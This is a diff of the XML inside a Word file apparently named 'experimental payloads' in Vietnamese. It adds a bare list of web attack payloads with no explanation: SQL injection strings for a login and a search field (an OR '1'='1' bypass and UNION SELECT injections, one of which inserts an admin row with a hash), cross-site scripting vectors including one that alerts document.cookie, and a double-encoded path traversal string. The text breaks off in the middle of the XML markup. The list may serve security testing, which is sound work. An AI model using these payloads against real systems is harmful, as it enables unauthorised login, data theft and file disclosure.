--- a/payload thực nghiệm.docx
+++ b/payload thực nghiệm.docx
@@ -3,253 +3,1470 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Xss: </w:t>
-      </w:r>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Login:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>admin' OR '1'='1' -- -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Search:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>a UNION select 123</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> AND 1=0 UNION ALL SELECT </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>161ebd7d45089b3446ee4e0d86dbcf92</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-pds"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0A3069"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;a onmouseover="alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)"\&gt;xxs link\&lt;/a\&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>IMG</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="err"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"""</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SCRIPT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nx"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>alert</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s2"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"XSS</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s2"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SCRIPT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t>"\&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="na"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>href</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="o"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>javascript:alert</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(String.fromCharCode(88,83,83))"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t>Click Me!</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>static/%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
